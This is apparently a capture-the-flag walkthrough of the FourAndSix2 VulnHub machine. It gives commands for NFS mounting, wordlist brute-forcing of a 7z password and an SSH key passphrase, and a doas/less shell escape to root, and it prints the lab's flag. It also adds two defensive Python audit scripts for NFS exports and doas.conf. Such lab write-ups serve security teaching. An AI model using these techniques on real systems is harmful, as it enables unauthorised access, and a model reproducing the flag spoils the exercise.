Today I will exploit the vulnerable image called "FourAndSix2". Here is the URL to download it: https://www.vulnhub.com/entry/fourandsix-201,266/. Once the download is done, import the image into VMware. Now here we go.
>> msfconsole
msf>> db_nmap 192.168.30.1/24
msf>> db_nmap 192.168.30.93
Reviewing the scan results, we find that the host is running NFS, and that is where we start.
msf>> search nfs
msf>> use ....
The next commands run in a normal shell on the attacking machine, not inside msfconsole: install the NFS client, create a mount point, mount the export without a lock daemon, and copy the backup archive out of it.
>> apt install nfs-common
>> mkdir /nfstest
>> mount -t nfs 192.168.30.93:/home/user/storage /nfstest -o nolock
>> cp /nfstest/backup.7z ~/vulnhub/fourandsix2
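As an added example (not part of the original write-up), here is a small audit script for the server side of what just happened: the storage export could be mounted from the scanning host with nothing more than mount -t nfs. It assumes the Linux exports(5) format ("/path host(options)") and nfsd's defaults (ro, root_squash, sec=sys); the target here runs OpenBSD, whose exports file uses a different syntax, so the format is an assumption, and the sample lines and all names are constructed for the example.

```python
"""Audit a Linux-style /etc/exports for shares reachable without authentication.

Added example; assumes exports(5) syntax "/path host(opt,...)" and nfsd defaults
(ro, root_squash, sec=sys). Sample lines are constructed.
"""
import re
from typing import List, Set, Tuple

# Constructed sample: the first export can be mounted by any host and trusts
# whatever uid the client claims; the second is the same share tightened up.
SAMPLE_EXPORTS = """
# /etc/exports (constructed sample)
/home/user/storage  *(rw,no_root_squash,no_subtree_check)
/srv/backups        backup-client.example.internal(rw,root_squash,sec=krb5p)
"""

# "host(options)" or just "host"; a bare "(options)" has an empty host part.
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text: str) -> List[Tuple[str, str, Set[str]]]:
    """Return one (path, client, options) triple per client spec.

    A path with no client, a bare "(options)", and "*" all mean every host
    that can reach the server.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:] or ["*"]
        for spec in clients:
            match = CLIENT_RE.match(spec)
            if not match:
                raise ValueError(f"cannot parse client spec {spec!r}")
            host = match.group(1) or "*"
            opts = set(filter(None, (match.group(2) or "").split(",")))
            entries.append((path, host, opts))
    return entries


def audit_exports(text: str) -> List[str]:
    """Flag settings that let an unauthenticated client read the export."""
    findings = []
    for path, host, opts in parse_exports(text):
        where = f"{path} -> {host}: "
        if host == "*":
            findings.append(where + "exported to every host; name the clients that need it")
        if "no_root_squash" in opts:
            findings.append(where + "no_root_squash: a client's root is root on this export")
        # Without sec= the server uses AUTH_SYS, which trusts the uid the client
        # presents; only the Kerberos flavors (krb5, krb5i, krb5p) authenticate.
        flavors = [o[len("sec="):].split(":") for o in opts if o.startswith("sec=")]
        if not flavors or "sys" in flavors[0]:
            findings.append(where + "AUTH_SYS: no client authentication, the client chooses its uid")
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```

Run it against a real exports file by passing its contents to audit_exports; the point to take from the sample is that a wildcard export with no sec=krb5 flavor is readable by anyone who can reach port 2049, whatever file permissions say, because the client picks the uid it presents.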
The archive backup.7z turns out to be password protected, so we upload it to https://www.lostmypass.com/ to recover the password.
Inside it we find id_rsa and id_rsa.pub, but id_rsa is itself protected by a passphrase, so we cannot use it to log in directly; we need to recover the passphrase of id_rsa.
cat /usr/share/wordlists/rockyou.txt | while read -r line; do if ssh-keygen -p -P "$line" -N password -f id_rsa >/dev/null 2>&1; then echo "$line"; break; fi; done
The loop stops on the passphrase: 12345678. Note that ssh-keygen -p does not merely test a passphrase: on success it rewrites id_rsa with the new passphrase given to -N, so from this point the key file opens with "password" rather than 12345678.
ssh -i id_rsa user@192.168.30.93
Once logged in, we look for setuid binaries and read the doas configuration:
>> find / -perm -u=s -type f 2>/dev/null
fourandsix2# cat /etc/doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
>> doas /usr/bin/less /var/log/authlog
The first rule lets user run less on the auth log as root without a password, and less can hand its file to an editor: inside less, press v to open the file in vi, then enter !sh to get a root shell.
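As an added example (not from the original write-up), here is a checker for doas.conf that would have flagged the rules shown above. It follows the doas.conf(5) grammar, defaults the target user to root as doas does, and uses an illustrative (not exhaustive) list of programs that can start a shell or editor from inside themselves. The two sample rules are the ones from the target's /etc/doas.conf; the function and variable names are my own.

```python
"""Audit an OpenBSD doas.conf for rules that amount to an unprotected root shell.

Added example, not from the write-up. Grammar per doas.conf(5):
    permit|deny [options] identity [as target] [cmd command [args ...]]
The target user defaults to root, as in doas. SHELL_ESCAPE_PROGRAMS is an
illustrative list, not a complete one.
"""
import os
import shlex
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Interactive programs that can launch a shell or an editor from inside themselves,
# which makes any "args" restriction on them meaningless.
SHELL_ESCAPE_PROGRAMS = {"less", "more", "vi", "vim", "view", "ex", "ed", "man", "ftp"}
OPTIONS = {"nopass", "nolog", "persist", "keepenv"}

# The two rules found in /etc/doas.conf on the FourAndSix2 target.
SAMPLE_DOAS_CONF = """\
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
"""


@dataclass
class Rule:
    action: str
    identity: str
    target: str = "root"
    cmd: Optional[str] = None          # None: any command
    args: Optional[List[str]] = None   # None: any arguments
    options: Set[str] = field(default_factory=set)


def parse_rule(line: str) -> Optional[Rule]:
    """Parse one doas.conf line; returns None for blank or comment-only lines."""
    tokens = shlex.split(line, comments=True)
    if not tokens:
        return None
    if tokens[0] not in ("permit", "deny"):
        raise ValueError(f"unknown action in {line!r}")
    rule = Rule(action=tokens[0], identity="")
    i = 1
    # Options come first; "setenv { ... }" is a brace-delimited group we skip over.
    while i < len(tokens) and (tokens[i] in OPTIONS or tokens[i] == "setenv"):
        if tokens[i] == "setenv":
            i += 1
            while i < len(tokens) and tokens[i] != "}":
                i += 1
        else:
            rule.options.add(tokens[i])
        i += 1
    if i >= len(tokens):
        raise ValueError(f"missing identity in {line!r}")
    rule.identity = tokens[i]
    i += 1
    if i < len(tokens) and tokens[i] == "as":
        rule.target = tokens[i + 1]
        i += 2
    if i < len(tokens) and tokens[i] == "cmd":
        rule.cmd = tokens[i + 1]
        i += 2
        if i < len(tokens) and tokens[i] == "args":
            rule.args = tokens[i + 1:]
    return rule


def audit_doas(conf_text: str) -> List[str]:
    """Return one finding per risky property of each permit rule."""
    findings = []
    for lineno, line in enumerate(conf_text.splitlines(), 1):
        rule = parse_rule(line)
        # Deny rules, and rules where identity already is the target, grant nothing new.
        if rule is None or rule.action != "permit" or rule.identity == rule.target:
            continue
        where = f"line {lineno} ({rule.identity} as {rule.target}): "
        if rule.cmd is None:
            findings.append(where + "no cmd restriction: any command as the target user")
        elif os.path.basename(rule.cmd) in SHELL_ESCAPE_PROGRAMS:
            findings.append(where + f"{rule.cmd} has shell escapes, so args restrictions do not contain it")
        if "nopass" in rule.options:
            findings.append(where + "nopass: no authentication before the command runs")
        if "keepenv" in rule.options:
            findings.append(where + "keepenv: caller's environment reaches the target process")
    return findings


if __name__ == "__main__":
    for finding in audit_doas(SAMPLE_DOAS_CONF):
        print(finding)
```

On the sample it reports three problems with the first rule and nothing for the second (root as root adds no privilege). The fix the checker points at is to never grant a pager or editor as root; if someone needs to read the auth log, grant a non-interactive command such as cat or a copy job, or change group ownership of the log instead.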
Finally, we get the flag: acd043bc3103ed3dd02eee99d5b0ff42
We also wrote shell loops for the 7z password and the id_rsa passphrase (the ssh-keygen loop is the one shown above). Not all tools worked well, but with some command magic:
cat /usr/share/wordlists/rockyou.txt | while read -r line; do 7z e backup.7z -p"$line" -oout -y >/dev/null 2>&1; if grep -iRl SSH out >/dev/null 2>&1; then echo "$line"; break; fi; done
Here -y stops 7z from asking before it overwrites the files left by the previous attempt; without it the prompt would read its answer from the wordlist pipe. grep is given the out directory as its search path, since without a path it would search the current directory, archive included.